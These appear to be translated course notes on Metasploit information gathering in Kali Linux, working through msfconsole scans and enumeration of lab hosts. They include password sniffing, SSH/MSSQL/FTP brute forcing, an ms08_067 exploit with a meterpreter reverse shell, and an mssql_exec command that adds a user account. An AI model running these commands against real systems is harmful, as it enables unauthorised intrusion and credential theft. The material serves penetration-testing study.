Kali Linux Penetration Testing 143 Metasploit Information Gathering

These notes record the detailed process of learning and using Kali Linux 2018.1 for penetration testing. They follow the course "Kali Linux Penetration Testing" from the Security Niu Classroom.

Kali Linux Penetration Testing (Yuan Fanghong) Blog Record

Module location:

  • The modules for information collection are all under auxiliary/scanner/

    msf > use auxiliary/scanner/ [TAB]
    Display all 531 possibilities? (y or n)
    

1. db_nmap

  • Same usage as nmap, but the results are stored in the msf database

    msf > db_nmap -sV 10.10.10.0/24
    

  • auxiliary directory

  • RHOSTS is a different option from RHOST: RHOSTS accepts multiple targets

    • 192.168.1.20-192.168.1.30, 192.168.1.0/24, 192.168.11.0/24
    • You can also supply a file containing a list of addresses: file:/root/h.txt
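
The target forms listed above can be expanded into a concrete host list before a scan is queued. The following Python is an added example, not course or Metasploit code; it handles the RHOSTS forms the notes list (comma or whitespace separated entries, CIDR blocks, full-address ranges and file: lists) and additionally the short range form 192.168.1.20-30.

```python
import ipaddress
import re
from typing import Iterator, List

# Added example (not from the course or Metasploit): expand an RHOSTS
# string into individual IPv4 addresses. Forms handled: single host,
# CIDR (10.10.10.0/24), full range (192.168.1.20-192.168.1.30), short
# range (192.168.1.20-30), and file:<path> with one entry per line.


def _expand_one(spec: str) -> Iterator[str]:
    spec = spec.strip()
    if not spec or spec.startswith("#"):
        return                                   # blank or comment line
    if spec.startswith("file:"):
        with open(spec[len("file:"):], encoding="utf-8") as fh:
            for line in fh:
                yield from _expand_one(line)     # nested forms allowed
        return
    if "/" in spec:
        # strict=False tolerates host bits, e.g. 10.10.10.5/24; like the
        # framework, the network and broadcast addresses are included
        for addr in ipaddress.ip_network(spec, strict=False):
            yield str(addr)
        return
    if "-" in spec:
        start, end = (s.strip() for s in spec.split("-", 1))
        if "." not in end:                       # short form: reuse prefix
            end = start.rsplit(".", 1)[0] + "." + end
        lo, hi = ipaddress.ip_address(start), ipaddress.ip_address(end)
        if hi < lo:
            raise ValueError(f"range end precedes start: {spec}")
        for net in ipaddress.summarize_address_range(lo, hi):
            for addr in net:
                yield str(addr)
        return
    yield str(ipaddress.ip_address(spec))        # single host


def expand_rhosts(rhosts: str) -> List[str]:
    """Return the de-duplicated host list in first-seen order."""
    seen, out = set(), []
    for spec in re.split(r"[,\s]+", rhosts.strip()):
        for addr in _expand_one(spec):
            if addr not in seen:
                seen.add(addr)
                out.append(addr)
    return out
```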

2. Host Discovery Scan

  • use auxiliary/scanner/discovery/arp_sweep
  • set INTERFACE, RHOSTS, SHOST, SMAC, THREADS; run

    msf > search arp
    msf > use auxiliary/scanner/discovery/arp_sweep
    msf auxiliary(scanner/discovery/arp_sweep) > show options 
    msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 10.10.10.0/24
    msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
    msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
    msf auxiliary(scanner/discovery/arp_sweep) > run
    

3. Port Scan

  • use auxiliary/scanner/portscan/syn
  • set INTERFACE, PORTS, RHOSTS, THREADS; run

    msf > search portscan
    msf > use auxiliary/scanner/portscan/syn
    msf auxiliary(scanner/portscan/syn) > show options 
    msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
    msf auxiliary(scanner/portscan/syn) > set PORTS 80
    msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24
    msf auxiliary(scanner/portscan/syn) > set THREADS 50
    msf auxiliary(scanner/portscan/syn) > run
    

4. Zombie scan

  • Find hosts with an incremental IP ID sequence (candidate idle-scan zombies)

    • use auxiliary/scanner/ip/ipidseq
    • set RHOSTS 192.168.1.0/24 ;run
    • nmap -PN -sI 10.10.10.147 10.10.10.132

      msf > use auxiliary/scanner/ip/ipidseq
      msf auxiliary(scanner/ip/ipidseq) > show options 
      msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150
      msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
      msf auxiliary(scanner/ip/ipidseq) > run
      

      msf > db_nmap -PN -sI 10.10.10.147 10.10.10.132
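
Whether a host qualifies as a zombie depends on how predictable its IP ID field is, which is what ipidseq reports for each target. The following Python is an added example (not course or Metasploit code) that sorts a captured sequence of IP IDs into the Nmap-style classes the module prints; the thresholds are assumptions chosen for this example. Run over probe replies from your own hosts, any class other than Randomized means the counter can be observed by third parties.

```python
from typing import List

# Added example (not from the course or Metasploit): classify an IP ID
# sequence observed in consecutive replies from one host. Only the
# "Incremental" class is usable for idle scanning; thresholds below are
# assumptions for this example, modelled on the Nmap ipidseq classes.


def ipid_class(ipids: List[int]) -> str:
    if len(ipids) < 2:
        return "Unknown"                      # too few probes to judge
    if all(i == 0 for i in ipids):
        return "All zeros"                    # stack never sets the field
    if all(i == ipids[0] for i in ipids):
        return "Constant"
    # successive differences, wrapped modulo 2^16 like the 16-bit field
    diffs = [(b - a) % 65536 for a, b in zip(ipids, ipids[1:])]
    if all(d % 256 == 0 and d <= 5120 for d in diffs):
        return "Broken little-endian incremental"   # byte-swapped counter
    if max(diffs) < 10:
        return "Incremental"                  # global counter, small steps
    if max(diffs) < 20000:
        return "Random positive increments"
    return "Randomized"                       # per-packet random IP IDs


def usable_as_zombie(ipids: List[int]) -> bool:
    """True only for a plain incremental counter (a defender wants False)."""
    return ipid_class(ipids) == "Incremental"
```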
      

5. UDP Scan

  • use auxiliary/scanner/discovery/udp_sweep
  • use auxiliary/scanner/discovery/udp_probe

    msf > use auxiliary/scanner/discovery/udp_sweep
    msf auxiliary(scanner/discovery/udp_sweep) > show options 
    msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150
    msf auxiliary(scanner/discovery/udp_sweep) > run
    

    msf > use auxiliary/scanner/discovery/udp_probe
    msf auxiliary(scanner/discovery/udp_probe) > show options 
    msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150
    msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131
    msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
    msf auxiliary(scanner/discovery/udp_probe) > run
    

6. Password Sniffing

  • use auxiliary/sniffer/psnuffle
  • Supports extracting passwords from pcap capture files
  • Function similar to dsniff
  • Currently only supports the pop3, imap, ftp and HTTP GET protocols

    msf > search sniffer
    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(sniffer/psnuffle) > show options 
    msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
    msf auxiliary(sniffer/psnuffle) > run
    

    root@kali:~# ftp 10.10.10.148
    

    # continuing from above
    msf auxiliary(sniffer/psnuffle) > show options
    msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
    msf auxiliary(sniffer/psnuffle) > jobs
    msf auxiliary(sniffer/psnuffle) > kill 0
    msf auxiliary(sniffer/psnuffle) > run
    

7. SNMP Scanning

  • vim /etc/snmp/snmpd.conf (change the listen address to 0.0.0.0:161)
  • use auxiliary/scanner/snmp/snmp_login
  • use auxiliary/scanner/snmp/snmp_enum
  • use auxiliary/scanner/snmp/snmp_enumusers (windows)
  • use auxiliary/scanner/snmp/snmp_enumshares (windows)

    msf > use auxiliary/scanner/snmp/snmp_login
    msf auxiliary(scanner/snmp/snmp_login) > show options 
    msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149
    msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
    msf auxiliary(scanner/snmp/snmp_login) > run
    

    msf > use auxiliary/scanner/snmp/snmp_enum
    msf auxiliary(scanner/snmp/snmp_enum) > show options 
    msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149
    msf auxiliary(scanner/snmp/snmp_enum) > run
    

    msf > use auxiliary/scanner/snmp/snmp_enum
    msf auxiliary(scanner/snmp/snmp_enum) > show options 
    msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142  # windows host
    msf auxiliary(scanner/snmp/snmp_enum) > run
    msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin  # SNMP server community name
    msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20
    msf auxiliary(scanner/snmp/snmp_enum) > run
    

    msf > use auxiliary/scanner/snmp/snmp_enumusers
    msf auxiliary(scanner/snmp/snmp_enumusers) > show options 
    msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
    msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142
    msf auxiliary(scanner/snmp/snmp_enumusers) > run
    

    msf > use auxiliary/scanner/snmp/snmp_enumshares
    msf auxiliary(scanner/snmp/snmp_enumshares) > show options 
    msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin
    msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 10.10.10.142
    msf auxiliary(scanner/snmp/snmp_enumshares) > run
    

8. SMB Scan

  • SMB version scan

    • use auxiliary/scanner/smb/smb_version
  • Scan named pipes to determine the SMB service type (account and password can be supplied)

    • use auxiliary/scanner/smb/pipe_auditor
  • Scan for DCERPC services reachable through SMB named pipes

    • use auxiliary/scanner/smb/pipe_dcerpc_auditor
  • SMB share enumeration (account and password can be supplied)

    • use auxiliary/scanner/smb/smb_enumshares
  • SMB user enumeration (account, password)

    • use auxiliary/scanner/smb/smb_enumusers
  • SID enumeration (account, password)

    • use auxiliary/scanner/smb/smb_lookupsid
  • SMB version scan

    msf > search smb
    msf > use auxiliary/scanner/smb/smb_version
    msf auxiliary(scanner/smb/smb_version) > show options 
    msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.147, 10.10.10.148, 10.10.10.142
    msf auxiliary(scanner/smb/smb_version) > run
    

    # continuing from above
    msf auxiliary(scanner/smb/smb_version) > set SMBUser Administrator
    msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_version) > run
    

  • Scan named pipes to determine the SMB service type (account and password can be supplied)

    msf > use auxiliary/scanner/smb/pipe_auditor
    msf auxiliary(scanner/smb/pipe_auditor) > show options 
    msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/pipe_auditor) > run
    

    # continuing from above
    msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
    msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
    

  • Scan for DCERPC services reachable through SMB named pipes

    msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options 
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
    

    # continuing from above
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
    

  • SMB share enumeration (account and password can be supplied)

    msf > use auxiliary/scanner/smb/smb_enumshares
    msf auxiliary(scanner/smb/smb_enumshares) > show options 
    msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/smb_enumshares) > run
    

    # continuing from above
    msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
    msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_enumshares) > run
    

  • SMB user enumeration (account, password)

    msf > use auxiliary/scanner/smb/smb_enumusers
    msf auxiliary(scanner/smb/smb_enumusers) > show options 
    msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/smb_enumusers) > run
    

    # continuing from above
    msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator
    msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_enumusers) > run
    

  • SID enumeration (account, password)

    msf > use auxiliary/scanner/smb/smb_lookupsid
    msf auxiliary(scanner/smb/smb_lookupsid) > show options 
    msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148
    

    # continuing from above
    msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator
    msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_lookupsid) > run
    

9. SSH Scan

  • SSH version scan

    • use auxiliary/scanner/ssh/ssh_version
  • SSH password brute force

    • use auxiliary/scanner/ssh/ssh_login
      • set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt ;set VERBOSE false ;run
  • SSH public key login

    • use auxiliary/scanner/ssh/ssh_login_pubkey
      • set KEY_FILE id_rsa;set USERNAME root ;run
  • SSH version scan

    msf > use auxiliary/scanner/ssh/ssh_version
    msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ssh/ssh_version) > run
    

  • SSH password brute force

    root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt 
    
    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
    msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false 
    msf auxiliary(scanner/ssh/ssh_login) > run
    

  • SSH public key login

    msf > use auxiliary/scanner/ssh/ssh_login_pubkey
    msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
    msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
    

10. Windows missing patches

  • Detection runs through an already-obtained session (post module)
  • use post/windows/gather/enum_patches

    • show advanced
    • set VERBOSE yes
  • If the check fails

    • There is a known bug in the WMI query; migrate to another process
    • After migrating to another process, run it again
  • ms08-067

    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147
    msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    msf exploit(windows/smb/ms08_067_netapi) > run
    

    meterpreter > background
    msf exploit(windows/smb/ms08_067_netapi) > sessions 
    

    msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches
    msf post(windows/gather/enum_patches) > set SESSION 4
    msf post(windows/gather/enum_patches) > run
    

    # process error, migrate to another process
    msf post(windows/gather/enum_patches) > sessions -i 4
    meterpreter > getpid
    meterpreter > ps
    meterpreter > migrate 828  # spoolsv.exe
    meterpreter > background 
    msf post(windows/gather/enum_patches) > run
    

11. MSSQL Scan

  • MSSQL port scan

    • TCP 1422 (dynamic port) / UDP 1434 (used to query the TCP port number)
    • use auxiliary/scanner/mssql/mssql_ping
  • MSSQL password brute force

    • use auxiliary/scanner/mssql/mssql_login
  • Remote code execution (after obtaining database privileges)

    • use auxiliary/admin/mssql/mssql_exec
    • set CMD net user user1 pass123 /ADD
  • MSSQL port scan

    msf > use auxiliary/scanner/mssql/mssql_ping
    msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142
    msf auxiliary(scanner/mssql/mssql_ping) > run
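
mssql_ping works by asking the SQL Server Browser service on UDP 1434 which TCP port each instance listens on, which is how the dynamic port is found. The following Python is an added example (not course or Metasploit code) that decodes that reply; the sample reply bytes, host name and version strings are constructed for this example.

```python
import socket
import struct
from typing import Dict, List

# Added example (not from the course or Metasploit): decode a SQL Server
# Browser (SSRP, UDP 1434) reply. Layout per MS-SQLR: one byte 0x05, a
# 16-bit little-endian length, then ASCII "key;value;" pairs with one
# ";;"-terminated record per instance.

SVR_RESP = 0x05


def parse_ssrp_response(data: bytes) -> List[Dict[str, str]]:
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP message")
    (size,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):
        fields = record.strip(";").split(";")
        if len(fields) < 2:
            continue                          # trailing empty record
        # key;value;key;value ...; a dangling odd field is ignored
        instances.append({fields[i]: fields[i + 1]
                          for i in range(0, len(fields) - 1, 2)})
    return instances


def query_browser(host: str, timeout: float = 2.0) -> List[Dict[str, str]]:
    """Live query: send CLNT_UCAST_EX (0x03) to UDP 1434 and decode the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(b"\x03", (host, 1434))
        data, _ = s.recvfrom(65535)
    return parse_ssrp_response(data)


# Constructed sample reply: a default instance on 1433 and a named instance
# on a dynamic port, as a real Browser service would report them.
_PAYLOAD = (b"ServerName;WIN2K3;InstanceName;MSSQLSERVER;IsClustered;No;"
            b"Version;9.00.1399.06;tcp;1433;;"
            b"ServerName;WIN2K3;InstanceName;SQLEXPRESS;IsClustered;No;"
            b"Version;10.50.1600.1;tcp;49172;"
            b"np;\\\\WIN2K3\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;")
SAMPLE_REPLY = bytes([SVR_RESP]) + struct.pack("<H", len(_PAYLOAD)) + _PAYLOAD
```

Disabling the SQL Server Browser service or filtering UDP 1434 removes this discovery path; clients then have to be given the instance port explicitly.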
    

12. FTP Scan

  • FTP version scan

    • use auxiliary/scanner/ftp/ftp_version
    • use auxiliary/scanner/ftp/anonymous
    • use auxiliary/scanner/ftp/ftp_login
  • use auxiliary/scanner/ [tab]

    • Display all 479 possibilities? (y or n)
  • Query version information

    msf > use auxiliary/scanner/ftp/ftp_version
    msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ftp/ftp_version) > run
    

  • Whether anonymous login is allowed

    msf > use auxiliary/scanner/ftp/anonymous
    msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ftp/anonymous) > run
    

  • Brute force

    use auxiliary/scanner/ftp/ftp_login
    


Origin http://43.154.161.224:23101/article/api/json?id=325570269&siteId=291194637